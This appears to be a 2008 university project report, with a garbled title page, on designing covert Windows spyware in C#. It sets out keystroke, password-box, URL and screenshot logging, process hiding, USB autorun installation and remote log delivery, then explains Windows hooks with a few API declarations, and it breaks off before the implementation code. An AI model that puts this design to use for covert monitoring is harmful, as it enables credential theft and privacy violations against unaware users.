W Wi in nd do ow ws s S Sp py y P Pr ro oj je ec ct t

treescattleΛογισμικό & κατασκευή λογ/κού

2 Νοε 2013 (πριν από 3 χρόνια και 9 μήνες)

130 εμφανίσεις

Windows Spy Project

Department of Electrical Engineering, Technion

2008

W
W
i
i
n
n
d
d
o
o
w
w
s
s


S
S
p
p
y
y


P
P
r
r
o
o
j
j
e
e
c
c
t
t







M
M
a
a
k
k
s
s
i
i
m
m


K
K
o
o
g
g
a
a
n
n


s
s
k
k
o
o
g
g
a
a
n
n
m
m
@
@
t
t
2
2
.
.
t
t
e
e
c
c
h
h
n
n
i
i
o
o
n
n
.
.
a
a
c
c
.
.
i
i
l
l


R
R
o
o
e
e
y
y


B
B
e
e
n
n


H
H
a
a
i
i
m
m




s
s
r
r
o
o
e
e
y
y
b
b
h
h
@
@
t
t
2
2
.
.
t
t
e
e
c
c
h
h
n
n
i
i
o
o
n
n
.
.
a
a
c
c
.
.
i
i
l
l



S
S
u
u
p
p
e
e
r
r
v
v
i
i
s
s
o
o
r
r


A
A
s
s
s
s
a
a
f
f


S
S
o
o
l
l
o
o
m
m
o
o
v
v
i
i
t
t
c
c
h
h




a
a
s
s
s
s
a
a
f
f
.
.
s
s
e
e
l
l
a
a
@
@
g
g
m
m
a
a
i
i
l
l
.
.
c
c
o
o
m
m
































L
L
a
a
b
b


C
C
h
h
i
i
e
e
f
f


E
E
n
n
g
g
.
.


I
I
l
l
a
a
n
n
a
a


D
D
a
a
v
v
i
i
d
d








S
S
o
o
f
f
t
t
w
w
a
a
r
r
e
e


S
S
y
y
s
s
t
t
e
e
m
m
s
s


L
L
a
a
b
b


D
D
e
e
p
p
a
a
r
r
t
t
m
m
e
e
n
n
t
t


o
o
f
f


E
E
l
l
e
e
c
c
t
t
r
r
i
i
c
c
a
a
l
l


E
E
n
n
g
g
i
i
n
n
e
e
e
e
r
r
i
i
n
n
g
g
,
,


T
T
e
e
c
c
h
h
n
n
i
i
o
o
n
n


-
-


I
I
s
s
r
r
a
a
e
e
l
l


I
I
n
n
s
s
t
t
i
i
t
t
u
u
t
t
e
e


o
o
f
f


T
T
e
e
c
c
h
h
n
n
o
o
l
l
o
o
g
g
y
y



Windows Spy Project

Software System Lab, Department of Electrical Engineering

Technion 2008


2

Table of Contents


Introduction


Windows Spy project

................................
................................
.........

5

Project goal

................................
................................
................................
...................

6

Technology overview
................................
................................
................................
....

7

The .NET Platform
................................
................................
................................
......

8

.NET Framework

................................
................................
................................
........

8

Compilation and the MSIL

................................
................................
.......................

10

The C# Language

................................
................................
................................
......

10

Requirements Document

................................
................................
...........................

12

Windows Hooks
................................
................................
................................
..........

17

Windows Messages
................................
................................
................................
...

17

Windows Hooks

................................
................................
................................
........

17

How to set a windows hook

................................
................................
......................

18

Hooks in .Net, the win32API class, and how we used it

................................
..........

20

Example of setting a hook in C#

................................
................................
...............

21

project overview
-

running modes and general software options

Client Application running Mode
................................
................................
.............

23

Settings
................................
................................
................................
......................

23

Stealth Mode

................................
................................
................................
..........

23

Starting and Stopping Time

................................
................................
...................

24

K
ey Logger

................................
................................
................................
...............

25

Options

................................
................................
................................
...................

25

Log File

................................
................................
................................
..................

25

Mouse Logger

................................
................................
................................
...........

27

Options

................................
................................
................................
...................

27

Log File

................................
................................
................................
..................

28

URL Logger

................................
................................
................................
..............

29

Options

................................
................................
................................
...................

29

Log File

................................
................................
................................
..................

30

Image Recorder

................................
................................
................................
.........

30

Options

................................
................................
................................
...................

31

Screenshots
................................
................................
................................
.............

31

Windows Spy Project

Software System Lab, Department of Electrical Engineering

Technion 2008


3

Remoting

................................
................................
................................
...................

31

Options

................................
................................
................................
...................

32

Client & Server Application running Mode

................................
............................

33

Client

................................
................................
................................
.........................

33

Server

................................
................................
................................
........................

34

Enable and Disable
................................
................................
................................
.

34

Sending the Files

................................
................................
................................
....

34

Ending the Monitoring

................................
................................
...........................

35

Sending Email

................................
................................
................................
........

35

Status

................................
................................
................................
......................

35

USB Spying Mode

................................
................................
................................
......

63

Autorun.inf

................................
................................
................................
................

36

Appinstall.exe

................................
................................
................................
...........

37

Init.txt

................................
................................
................................
........................

38

code snippets and implementaion of the softwa
re

Client Implementation techniques & Code

................................
.............................

39

Key Logger

................................
................................
................................
...............

39

Initializing Keyboard Hook

................................
................................
...................

39

The Key Logger

................................
................................
................................
.....

41

Disabling the Key Logger

................................
................................
......................

42

Mouse Logger

................................
................................
................................
...........

43

Initializing Mouse Hook

................................
................................
........................

43

The Mouse Logger

................................
................................
................................
.

43

Disabling the Mouse Logg
er
................................
................................
..................

44

URL Hook
................................
................................
................................
.................

45

Image Recorder

................................
................................
................................
.........

48

Create a Screenshot

................................
................................
................................

48

Time Intervals

................................
................................
................................
........

48

Dangerous Keystrokes

................................
................................
...........................

49

Timer

................................
................................
................................
.........................

50

Email

................................
................................
................................
.........................

52

Stealth Mode & password

................................
................................
.........................

53

Server Communication implementation

................................
................................
..

55

The Client Side
................................
................................
................................
..........

55

Windows Spy Project

Software System Lab, Department of Electrical Engineering

Technion 2008


4

The Server Side

................................
................................
................................
.........

56

File transferring
................................
................................
................................
.........

57

Picture transferring
................................
................................
................................
....

62

Get Status

................................
................................
................................
..................

65

Enable/disable

................................
................................
................................
...........

67

Design

................................
................................
................................
..........................

69

Client Class Diagram

................................
................................
................................

69

Client Class Diagram Overview

................................
................................
............

70

Server Class Diagram
................................
................................
................................

71

Server Class Diagram Overview
................................
................................
............

71

File Transfer Sequence D
iagram
................................
................................
...............

72

File Transfer Sequence Diagram Overview
................................
...........................

73

Image Transfer Sequence Diagram
................................
................................
...........

74

Image Transfer Sequence Diagram Overview

................................
.......................

75

Single Command Sequence Diagram

................................
................................
.......

75

Single Command Sequence D
iagram Overview
................................
....................

75
























Windows Spy Project

Software System Lab, Department of Electrical Engineering

Technion 2008


5

Introduction


Windows Spy project

Spy Software (also called “Computer Monitoring Software”) is undetectable software
the runs on a computer, and secretly records a computer user by
capturing all
keystrokes, websites visited, documents read, chat conversations, etc.

Some of the more real life popular uses of such application are child Internet
-
monitoring, and employee monitoring, or simply making sure no one uses your
computer imprope
rly when yore gone.


The internet is full of ads for different types of tracking software to download for
monitoring your family, friends, anyone who uses your computer after you’re gone,
etc.

With the Internet exposing the surfers to any type of informati
on, including those
inappropriate to minors or even illegal and abusive to all, the need for such programs
increases and becomes a must
-
have software to any house hold today.


The level of monitoring done can vary from just logging all the key strokes of t
he
user, to making screenshots of the computer’s desktop on predefined typed words.

Spying software can also be in the form of web based service. In this type of spying
service, the owner is not required to physically access the monitored computer to view
the recordings. Everything is saved and maintained on a web server.

Our project consists of building full applicable spying software with all common
features (and more) included, such as:

Recording key strokes, mouse movements and clicks, websites visited,

programs
visited and files changed and viewed, dates and times of different actions, making
snapshots of the computer screen at pre
-
defined events. Any combination of the above
is possible to define for a specific software run.

Furthermore, we implemente
d a web server which can completely control the
application that runs on a remote computer. We have such options as enable or disable
our running application or close it completely; we can check if the user is currently
working on the machine or not, send
the log files created to our Email, or even
instantly send the logs we choose to our computer.

Furthermore, a technique for fast install of the software on any computer, also making
it load on start
-
up was developed. In this scenario, you can install the a
pplication with
a single click, making sure it starts running even after computer reboot.


Another important feature of spying that was implemented in our application is the
hidden and undetected running mode of the software. We took special care for
enab
ling a stealth running mode, disguise the process itself, and make sure that file
transferring to the server and the log files creation doesn’t interfere or felt by the user
working on the computer.

All of the project components described above create a co
mplete real life usable
spying software, that can be used on any windows version with .net framework
installed, to create a complete picture of activities done on any PC.





Windows Spy Project

Software System Lab, Department of Electrical Engineering

Technion 2008


6

Project goal


This is first and foremost an academic project, intended to int
roduce us, the students,
to the .NET framework as a whole, while also exposing us to the C# programming
language.


Why Spying Software?


This type of software includes many interesting as well as complex aspects of
programming. Because the spying involves
many different types of information to be
recorded, almost each type presented us with a new challenge and a new technique to
solve it. For example we had to use thread programming involving locks to do the
URL Logger, and the client/server listening funct
ions, as well as socket programming
to implement their communication.


We had to learn quite a few new technologies and subjects, which are all incorporated
in this work some way or the other.

Among the things we have learnt:



.net platform and C#



Windows

Forms and controls



Low level win32 API programming



Windows messages



Windows hooks technology



Event driven programming



Socket programming



Thread Programming


























Windows Spy Project

Software System Lab, Department of Electrical Engineering

Technion 2008


7

Technology overview

Every 10 years or so, a new approach to programming h
its like a tsunami. In the early
1980s, the new technologies were Unix, which could be run on a desktop, and a
powerful new language called C, developed by AT&T. The early 90s brought
Windows and C++. Each of these developments represented a sea change in
the way
we approached programming. Now, .NET and C# are the next wave.

Microsoft has "bet the company" on .NET. When a company of their size and
influence spends billions of dollars and reorganizes its entire corporate structure to
support a new platform,
programmers take notice. It turns out that .NET represents a
major change in the way you'll think about programming. It is, in short, a new
development platform designed to facilitate object
-
oriented Internet development. The
programming language of choice

for this platform is C#, which builds on the lessons
learned from C (high performance), C++ (object
-
oriented structure), Java (garbage
collection, high security), and Visual Basic (rapid development) to create a new
language ideally suited for developing
component
-
based,
n
-
tier distributed web
applications.

The goal of C# is to provide a simple, safe, modern, object
-
oriented, Internet
-
centric,
high
-
performance language for .NET development. C# is a new language, but it draws
on the lessons learned over th
e past three decades. In much the way that you can see
in young children the features and personalities of their parents and grandparents, you
can easily see in C# the influence of Java, C++, Visual Basic (VB), and other
languages.



























Windows Spy Project

Software System Lab, Department of Electrical Engineering

Technion 2008


8

The .NET Platform

When Microsoft announced C# in July 2000, its unveiling was part of a much larger
event: the announcement of the .NET platform. The .NET platform is, in essence, a
new development framework that provides a fresh application programmin
g interface
(API) to the services and APIs of classic Windows operating systems (especially the
Windows 2000 family), while bringing together a number of disparate technologies
that emerged from Microsoft during the late 1990s. This includes COM+ component

services, the ASP web development framework, a commitment to XML and object
-
oriented design, support for new web services protocols such as SOAP, WSDL, and
UDDI, and a focus on the Internet, all integrated within the DNA architecture.

Microsoft says it i
s devoting 80% of its research and development budget to .NET and
its associated technologies. The results of this commitment to date are impressive. For
one thing, the scope of .NET is huge. The platform consists of four separate product
groups:



A set of

languages, including C# and Visual Basic .NET, a set of development
tools including Visual Studio .NET, a comprehensive class library for building
web services and web and Windows applications, as well as the Common
Language Runtime (CLR) to execute objec
ts built within this framework.



A set of .NET Enterprise Servers, formerly known as SQL Server 2000,
Exchange 2000, BizTalk 2000, and so on, that provide specialized
functionality for relational data storage, email, B2B commerce, etc.



An offering of comm
ercial web services, called .NET My Services. For a fee,
developers can use these services in building applications that require
knowledge of user identity, etc.



New .NET
-
enabled non
-
PC devices, from cell phones to game boxes.

.NET Framework

Microsoft .N
ET supports not only language independence, but also language
integration. This means that you can inherit from classes, catch exceptions, and take
advantage of polymorphism across different languages. The .NET Framework makes
this possible with a specific
ation called the
Common

Type

System

(CTS) that all
.NET components must obey. For example, everything in .NET is an object of a
specific class that derives from the root class called System.Object. The CTS supports
the general concept of classes, interface
s, delegates (which support callbacks),
reference types, and value types.

Additionally, .NET includes a
Common

Language

Specification

(CLS), which
provides a series of basic rules that are required for language integration. The CLS
determines the minimum
requirements for being a .NET language. Compilers that
conform to the CLS create objects that can interoperate with one another. The entire
Framework Class Library (FCL) can be used by any language that conforms to the
CLS.

The .NET Framework sits on top
of the operating system, which can be any flavor of
Windows, and consists of a number of components, currently including:

Windows Spy Project

Software System Lab, Department of Electrical Engineering

Technion 2008


9



Four official languages: C#, VB.NET, Managed C++, and JScript.NET



The CLR, an object
-
oriented platform for Windows and web developmen
t that
all these languages share



A number of related class libraries, collectively known as the FCL

The most important component of the .NET Framework is the CLR, which provides
the environment in which programs are executed. The CLR includes a virtual
m
achine, analogous in many ways to the Java virtual machine. At a high level, the
CLR activates objects, performs security checks on them, lays them out in memory,
executes them, and garbage
-
collects them. (The Common Type System is also part of
the CLR.)

The layer on top of the CLR is a set of framework base classes, followed by an
additional layer of data and XML classes, plus another layer of classes intended for
web services, Web Forms, and Windows Forms. Collectively, these classes make up
the FCL, one

of the largest class libraries in history and one that provides an object
-
oriented API for all the functionality that the .NET platform encapsulates. With more
than 4,000 classes, the FCL facilitates rapid development of desktop, client/server,
and other
web services and applications.

The set of Framework base classes, the lowest level of the FCL, is similar to the set of
classes in Java. These classes support rudimentary input and output, string
manipulation, security management, network communication, t
hread management,
text manipulation, reflection and collections functionality, etc.

Above this level is a tier of classes that extend the base classes to support data
management and XML manipulation. The data classes support persistent management
of data
that is maintained on backend databases. These classes include the Structured
Query Language (SQL) classes to let you manipulate persistent data stores through a
standard SQL interface. Additionally, a set of classes called ADO.NET allows you to
manipulate

persistent data. The .NET Framework also supports a number of classes to
let you manipulate XML data and perform XML searching and translations.

Extending the Framework base classes and the data and XML classes is a tier of
classes geared toward building

applications using three different technologies: Web
Services, Web Forms, and Windows Forms. Web services include a number of classes
that support the development of lightweight distributed components, which will work
even in the face of firewalls and NAT

software. Because web services employ
standard HTTP and SOAP as underlying communications protocols, these
components support Plug and Play across cyberspace.

Web Forms and Windows Forms allow you to apply Rapid Application Development
techniques to buil
ding web and Windows applications. Simply drag and drop controls
onto your form, double
-
click a control, and write the code to respond to the associated
event.

Windows Spy Project

Software System Lab, Department of Electrical Engineering

Technion 2008


10

Compilation and the MSIL

In .NET, programs are not compiled into executable files, they are com
piled into
Microsoft

Intermediate

Language

(MSIL) files, which the CLR then executes. The
MSIL (often shortened to IL) files C# produces are
identical

to the IL files that other
.NET languages produce; the platform is language
-
agnostic. A key fact about th
e CLR
is that it is
common
: the same runtime supports development in C# as well as in
VB.NET.

C# code is compiled into IL when you build your project. The IL is saved in a file on
disk. When you run your program, the IL is compiled again, using the
Just

I
n

Time

(JIT) compiler (a process often called
JITing
). The result is machine code, executed
by the machine's processor.

The standard JIT compiler runs
on

demand
. When a method is called, the JIT
compiler analyzes the IL and produces highly efficient machi
ne code, which runs very
fast. The JIT compiler is smart enough to recognize when the code has already been
compiled, so as the application runs, compilation happens only as needed. As .NET
applications run, they tend to become faster and faster, as the al
ready compiled code
is reused.

The CLS means that all .NET languages produce very similar IL code. As a result,
objects created in one language can be accessed and derived from another. Thus it is
possible to create a base class in VB.NET and derive from
it in C#.

The C# Language

The C# language is disarmingly simple, with only about 80 keywords and a dozen
built
-
in datatypes, but C# is highly expressive when it comes to implementing modern
programming concepts. C# includes all the support for structured
, component
-
based,
object
-
oriented programming that one expects of a modern language built on the
shoulders of C++ and Java.

The C# language was developed by a small team led by two distinguished Microsoft
engineers, Anders Hejlsberg and Scott Wiltamuth.
Hejlsberg is also known for
creating Turbo Pascal, a popular language for PC programming, and for leading the
team that designed Borland Delphi, one of the first successful integrated development
environments for client/server programming.

At the heart of

any object
-
oriented language is its support for defining and working
with classes. Classes define new types, allowing you to extend the language to better
model the problem you are trying to solve. C# contains keywords for declaring new
classes and their
methods and properties, and for implementing encapsulation,
inheritance, and polymorphism, the three pillars of object
-
oriented programming.

In C#, everything pertaining to a class declaration is found in the declaration itself. C#
class definitions do no
t require separate header files or Interface Definition Language
(IDL) files. Moreover, C# supports a new XML style of inline documentation that
simplifies the creation of online and print reference documentation for an application.

Windows Spy Project

Software System Lab, Department of Electrical Engineering

Technion 2008


11

C# also supports
inter
faces
, a means of making a contract with a class for services that
the interface stipulates. In C#, a class can inherit from only a single parent, but a class
can implement multiple interfaces. When it implements an interface, a C# class in
effect promises

to provide the functionality the interface specifies.

C# also provides support for
structs
, a concept whose meaning has changed
significantly from C++. In C#, a struct is a restricted, lightweight type that, when
instantiated, makes fewer demands on the
operating system and on memory than a
conventional class does. A struct can't inherit from a class or be inherited from, but a
struct can implement an interface.

C# provides component
-
oriented features, such as properties, events, and declarative
construc
ts (called
attributes
). Component
-
oriented programming is supported by the
CLR's support for storing metadata with the code for the class. The metadata
describes the class, including its methods and properties, as well as its security needs
and other attri
butes, such as whether it can be serialized; the code contains the logic
necessary to carry out its functions. A compiled class is thus a self
-
contained unit.
Therefore, a hosting environment that knows how to read a class' metadata and code
needs no other

information to make use of it. Using C# and the CLR, it is possible to
add custom metadata to a class by creating custom attributes. Likewise, it is possible
to read class metadata using CLR types that support reflection.

An
assembly

is a collection of f
iles that appear to the programmer to be a single
dynamic link library (DLL) or executable (EXE). In .NET, an assembly is the basic
unit of reuse, versioning, security, and deployment. The CLR provides a number of
classes for manipulating assemblies.

A fi
nal note about C# is that it also provides support for directly accessing memory
using C++ style pointers and keywords for bracketing such operations as unsafe, and
for warning the CLR garbage collector not to collect objects referenced by pointers
until t
hey are released.
























Windows Spy Project

Software System Lab, Department of Electrical Engineering

Technion 2008


12

Requirements Document

Abstract


Spy Software (also called “Computer Monitoring Software”) is a piece of
undetectable software that runs on a computer, and secretly records computer usage
by capturing all I/O activ
ity, including keystrokes, websites visited, documents read,
chat conversations, etc.

Common use of such applications includes child Internet
-
monitoring, and employee
monitoring.

The level of monitoring done can vary from just logging all the key strokes o
f the
user, to getting screenshots of the computer’s desktop, and all the way to making a
full video recording of the user’s actions.

It creates detailed reports for the software installer, which are hidden from the person
being monitored.

Spy software ca
n also be in the form of web based service. In this type of service, the
owner is not required to physically access the monitored computer to view the
recordings. Everything logged on a remote server.


Our application intends to implement the principles ab
ove, allowing the owner to
configure and choose the monitoring options available for tracking usage on the
computer.


1.

System objectives


1.1.

Windows
-
Spy (henceforth called the system) is a “hidden” (the user is
unaware of its existence) software application th
at tracks different types of
information (according to the owner’s request) and saves it at a predefined
location, known only to the owner.

1.2.

The install and activate actions are made by the owner on the computer itself,
but the information recorded is sent
to a remote server (in addition to being
saved on the monitored computer). The owner may now view the information
by downloading it from the server (as well as from the monitored computer
itself as described in 1.1).

1.2.1.

The activation may also be adjusted to

be done remotely.

1.2.2.

Auto
-
install from the web will be possible.


2.

System Context


Upon installation and launch, the system will provide a GUI for the owner and ask it
to choose the options for the current monitoring session



2.1.

Stealth mode or visible mode of

work (from the user’s side).



2.1.1.

While in stealth mode, the system is completely hidden (no start menu,

no taskbar icon, if possible


not even at the Add/Remove Programs
menu and the task manager).

When it’s time to change settings/turn off, the owner sh
ould open the

hidden interface by pressing a secret key combination (that he set
beforehand), which will bring up a password box, after typing the
password, he will be able to make changes.

2.1.2.

While in Visible mode, tray icon will appear, but the system is st
ill

Windows Spy Project

Software System Lab, Department of Electrical Engineering

Technion 2008


13

password protected (though no secret combination is required)


2.2.

Types of monitoring


2.2.1.

Keystroke Monitoring



2.2.1.1.

Key Logger
-

Track all keystrokes pressed (regardless in which

window they were pressed in)

2.2.1.2.

Log all keystrokes made in internet browser
along with the URL.

2.2.1.3.

Log all keystrokes and which processes they were pressed in.

This includes the application name (e.g. “Notepad”, “Microsoft
Word”, “Microsoft internet explorer”) and the box in the
application (if there is such) itself


e.g. “Microso
ft explorer


Sign in”, here the keystrokes were in the “Sign in” box
(password) in the explorer application.




If the application is a browser, the URL will be logged as
well.



If the application is an editor of some sort, the file
-
name that
was edited will

be logged.


2.2.1.3.1.

Choose the applications for monitoring keystrokes.

The owner will be able to choose from a list of applications
which applications to monitor keystrokes.

(2.2.1.3 is the option


“all applications”).


2.2.2.

Site monitoring: Record all website URLs
that were accessed.

2.2.3.

Documents Opened
-

Record documents and files accessed

(such as
Microsoft Office documents, pictures, etc).


2.2.4.

Record which processes ran.

2.2.5.

Screen snapshots taken automatically at regular intervals.

2.2.5.1.

Saving only screenshots of a we
b browser (with the URL) only
will


be an option.

2.2.5.2.
Optional


configure making screen shots only when certain words
are typed (for example: if the word “facebook” is typed, the boss
of the employee would like some shots of the screen as a suspicion
t
hat the employee is surfing the facebook site during work).

2.2.6.

Video recording of the desktop (screen
-
capture using an open source

software).

2.2.7.

Real
-
Time remote monitoring.


2.3.

Define where the log files will be placed

2.3.1.

Predefined (default) folder

2.3.2.

Define a cus
tomized folder.

2.3.3.

Delivery via FTP to a remote server / Log delivery via email.

In case of selecting one of these options, the logs delivery is done only
when computer is not in use (a pre
-
defined amount of time has passed
without any mouse/keyboard use indi
cating the user left the computer).

This will be a good time to use the internet service for sending the
files, this way not loading the network and slowing possible user
activity (making the process un
-
noticed for the user)

Windows Spy Project

Software System Lab, Department of Electrical Engineering

Technion 2008


14


2.4.

Time scheduling
-

The spy prog
ram can be configured to start and stop
recording at the times specified by owner.

2.4.1.

start time may be immediate and finish time is when the computer is
“not

in use” (as explained in 2.3.3) and begin again when usage is renewed,
and

so on.


2.5.

The system will

provide usage statistics (date, time, etc) within all tracking
options (which time each web page was visited, etc...).


2.6.

A

single instance application
-

If the owner starts a second copy of Windows
-
Spy, the first copy is brought to the foreground instead o
f starting a second
copy.


2.7.

On top application


when the system is launched (with the secret
combination explained later) it appears in front of other applications on the
screen.



3.

Functional Requirements


Upon launch of the application, we get the setting
s interface window.

The setting interface appears only in the following scenarios





After launching the application.



When running in stealth mode, and the secret key combination is pressed,
afterwards the correct password is entered.

If the user is accid
entally presses this combination he’ll get stuck with the
password window (in front) until he closes it (or the password is entered).



When running in visible mode and the system’s tray icon is selected.


The settings interface includes the following boxes

-





Password setup (Type/confirm password fields).



Hot keys setup.



Choose the mode to run in
-

Stealth/Visible mode.



Choose the kind of monitoring type wanted (according to the different types
mentioned in the system context section).

If screenshots mon
itoring selected, the owner will need to specify the
frequency of the snapshots taken in any case.

(If the option of making a screen shot only when special words are typed, the
owner will have the ability to write the “alert” words he wants).



Clear curren
t log files.

The action (pressing the button) deletes all log files that are currently saved in
the hidden logs folder.



Description of the log files (size and type log file).

Alongside the settings options, current log files statistics will be shown, in th
e
same window.

Windows Spy Project

Software System Lab, Department of Electrical Engineering

Technion 2008


15



Set monitoring schedule (work non
-
stop from time of activation, or a specific
start and finish time can be given).



For Remote Monitoring
-

Description of the monitoring computer (email or IP
address for a remote server) for the log files t
o be sent to.

In these options, the owner will specify how frequently he wants the
monitored data to be sent to him (note: the data will be saved in the hidden
folder on the computer, as well)


The system shall provide defaults for all missing elements n
eeded for current
monitoring action (the default monitoring type, default password, default snapshots
frequency)


these parameters will already defaulted, so the owner could run the
application by just pressing “start”.


After the owner finishes configuri
ng the settings, pressing “Start” will begin the
monitoring in the specified mode.


Stopping the application




There are 2 scenarios in which the applications stops





if in stealth mode, the program stops monitoring as soon as the owner enters
the correc
t password combination (that appears after typing the secret keys
combination).

If in visible mode, selecting the tray icon and the “stop” button stops the
application.

As mentioned earlier, in both cases the setting window appears on screen (and
on top)
.



If windows restarts or shuts down, in the next start
-
up the application is
disabled.


Accessing the log
-
files



The folder of the log files will be saved on disk and will be hidden from the computer
user (password protected/invisible…). Further more, ac
cess to the folder during
system activity (monitoring in progress) will be forbidden (not to cause a conflict with
the system). After the monitoring stops access is available (via direct access or the
“clear
-
logs” button in the interface). The log
-
statisti
cs will be updated the next time
the interface window re
-
appears (i.e. erasing some logs, won’t change the “statistics”
window mentioned).

-

Only one logs
-
folder will be at any time on the computer (so that if we start a new
session, the option of definin
g a
-

new logs folder (2.3) will ask for deleting the old
one if there is such.


4.

Non
-
Functional Requirements

Maintenance: the folder holding the Log
-
files should be rather small (the owner
should maintain it) so that it won't over
-
size the disk/partition s
ubstantially
.

Portability: any windows SP2 OS or newer.

Performance:


The system activity will not degrade performance of the
applications running on the machine.


Windows Spy Project

Software System Lab, Department of Electrical Engineering

Technion 2008


16

5.

Environment Requirements


The requirements needed to run the application are
-



5.1.

All windows

XP SP2 versions and newer (the only demand is that the win
API functions we use will be available in the specific windows version that
the software is installed on)


5.2.

.NET framework version 1.0 or better.



6.

Future Requirements


In the future, the monitori
ng will be processed in a remote computer which will get all
the information stated. Moreover, we would like to save snapshots of the screen and
perhaps a file providing s short monitoring movie.

* These are more advanced features hence put in the “future

requirements” (although
specified in the document above).

Also, if the remote log viewing will be implemented, further requirements will
be added, regarding what happens if the mail address is incorrect, or the system is
unable to connect to the internet
or the remote server, etc…





























Windows Spy Project

Software System Lab, Department of Electrical Engineering

Technion 2008


17

Windows Hooks

The Windows Hooks mechanism is a crucial subject in our application and was a
starting point for the 3 main loggers of the application (Keys, Mouse, URL). In this
chapter we will see what

windows hooks are, why they are so important, how they
work, and how to use them. First we’ll explain about windows messages:

Windows Messages

Unlike MS
-
DOS
-
based applications, Windows
-
based applications are event
-
driven.
They do not make explicit functio
n calls (such as C run
-
time library calls) to obtain
input. Instead, they wait for the system to pass input to them.The system passes all
input for an application to the various windows in the application. Each window has a
function, called a window proced
ure, that the system calls whenever it has input for
the window. The window procedure processes the input and returns control to the
system


The system passes input to a window procedure in the form of
messages
. Messages
are generated by both the system an
d applications. The system generates a message at
each input event, for example
-

When an application is hidden by another window and
then brought to the front, for example, Windows sends that application a WM_PAINT
message. The WM_PAINT message instructs
the application to redraw its main
window. Likewise, Windows sends the application a WM_MOUSEMOVE message
every time the mouse moves over the application.

An application can generate messages to direct its own windows to perform tasks or
to communicate wit
h windows in other applications.

The system sends a message to a window procedure with a set of four parameters: a
window handle, a message identifier, and two values called message parameters. The
window handle identifies the window for which the message

is intended. The system
uses it to determine which window procedure should receive the message.

To manage all of these messages, Windows maintains message queues. A message
queue is a FIFO (first in, first out) list of messages. Messages are placed in th
e queue
and processed in order they were received. Windows will process the messages in the
queue when it has time. Windows maintains a global system message queue and
separate message queues for each GUI thread.

Windows Hooks

A hook is a point in the syst
em message
-
handling mechanism where an
application can install a subroutine to monitor the message traffic in the system
and process certain types of messages before they reach the target window
procedure.

Windows hooks can be considered one of the most po
werful features of Windows.
With them, you can trap events that will occur, either in your own process or in other
processes. By "hooking", you tell Windows about a function (filter function, also
called hook procedure), that will be called every time an e
vent you're interested in
occurs.

The system supports many different types of hooks; each type provides access to a
different aspect of its message
-
handling mechanism. For example, an application can
use the
WH_MOUSE Hook

to monitor the message traffic for mouse messages.

Windows Spy Project

Software System Lab, Department of Electrical Engineering

Technion 2008


18

The system maintains a separate hook chain for each type of hook. A hook chain is a
list of pointers to special, application
-
defined call
back functions called hook
procedures. When a message occurs that is associated with a particular type of hook,
the system passes the message to each hook procedure referenced in the hook chain,
one after the other.

A fundamental aspect of hooks is their scope. Normally, hooks may have either
system or thread scope. A few, however, can only have system scope. When a hook
works a
t the thread level, it can only trap events generated within that thread. For
example, a keyboard hook gets invoked only for the keystrokes directed to the
thread's input queue. Similarly, a system wide mouse hook gets called whenever the
user moves the mo
use, regardless of the particular thread that handles the event. A
system
-
scoped hook is called to handle the event for all the currently running threads.

How to set a windows hook

The
SetWindowsHookEx

function installs an application
-
defined hook procedur
e
into a hook chain. You would install a hook procedure to monitor the system for
certain types of events. These events are associated either with a specific thread or
with all threads in the same desktop as the calling thread.


HHOOK

SetWindowsHookEx(


in
t

idHook
,

HOOKPROC

lpfn
,

HINSTANCE

hMod
,

DWORD

dwThreadId

);


idHook

Specifies the type of hook procedure to be installed. For example
WH_KEYBOARD_LL

Installs a hook procedure that monitors low
-
level keyboard input events.

lpfn


Pointer to the hook proc
edure.

hMod


Handle to the hook installed.

dwThreadId


Specifies the identifier of the thread with which the hook procedure is to be
associated. If this parameter is zero, the hook procedure is associated with all
existing threads running in the same desk
top as the calling thread.

The
UnhookWindowsHookEx

function removes a hook procedure installed in a
hook chain by
the
SetWindowsHookEx

function.

BOOL

UnhookWindowsHookEx(

HHOOK

hhk

);


Windows Spy Project

Software System Lab, Department of Electrical Engineering

Technion 2008


19

hhk


The handle to the hook to be removed. This parameter is a hook handle that is
returned by the call to
SetWindowsHookEx

that installed the hook.


At the end of the handle function of the hook, you must call the
CallNextHookEx
Function
.

The
Ca
llNextHookEx

function passes the hook information to the next hook
procedure in the current hook chain (is there is none, then the message returns to the
system handling). A hook procedure can call this function either before or after
processing the hook i
nformation.

If you don’t call this function, you block the message from going on to the system!
(for example, this way you can prevent keystrokes from having any effect)


LRESULT

CallNextHookEx(


HHOOK

hhk
,

int

nCode
,

WPARAM

wParam
,

LPARAM

lParam

);


hhk


Handle to the current hook

nCode


[Specifies the hook code passed to the current hook procedure. The next hook
procedure uses this code to determine how to process the hook information.

wParam


[Specifies the
wParam

value passed to the current hook proc
edure. The
meaning of this parameter depends on the type of hook associated with the
current hook chain.

lParam


Specifies the
lParam

value passed to the current hook procedure. The meaning
of this parameter depends on the type of hook associated with the

current hook
chain.



These 3 functions are the main function of setting a hook by your application.

An example of how it is done in C#, as well as example of the handle function and
how exactly to use these 3 functions can be seen next.







Windows Spy Project

Software System Lab, Department of Electrical Engineering

Technion 2008


20

Hooks in .N
et, the win32API class, and how we used it

The .NET Framework provides no built
-
in facilities or infrastructure to handle
hooks.But, Setting up hooks in .NET
-
centric apps is as easy as calling the underlying
API functions

that is, SetWindowsHookEx to insta
ll a hook and
UnhookWindowsHookEx to uninstall. To issue calls to Win32 API functions from
within .NET applications, you must first import the desired API declarations into
some sort of managed class.


Win32 API
-


The Microsoft Windows application program
ming interface (API) provides services
used by all Windows
-
based applications. You can provide your application with a
graphical user interface; access system resources such as memory and devices;
display graphics and formatted text; incorporate audio, vid
eo, networking, or security.
The Windows API can be used in all Windows
-
based applications. The same
functions are generally supported on 32
-
bit and 64
-
bit Windows.


To use win32API functions we create a class


Win32API with all the necessary
declaration,

so we could use these functions in our .net application.

you can see there the C# code to import all the Win32 definitions needed to handle
hooks. Functions are imported as static, externally defined members of a new .NET
class. Any .NET class can access
the Win32API class and invoke members. When
this happens, the P/Invoke infrastructure guarantees that the call is marshaled back
and forth to the system API across the CLR.

For example:


[
DllImport
(
"user32.dll"
, CharSet =
CharSet
.Auto, SetLastError =
true
)
]

public

static

extern

IntPtr

SetWindowsHookEx(
int

idHook,

RootHook.PtrCALLBACK lpfn,
IntPtr

hMod,
uint

dwThreadId);


(the
RootHook.PtrCALLBACK

is the handle function pointer)

[
DllImport
(
"user32.dll"
, CharSet =
CharSet
.Auto, SetLastError =
true
)]

public

s
tatic

extern

IntPtr

CallNextHookEx(
IntPtr

hhk,
int

nCode,

IntPtr

wParam,
IntPtr

lParam);


[
DllImport
(
"user32.dll"
, CharSet =
CharSet
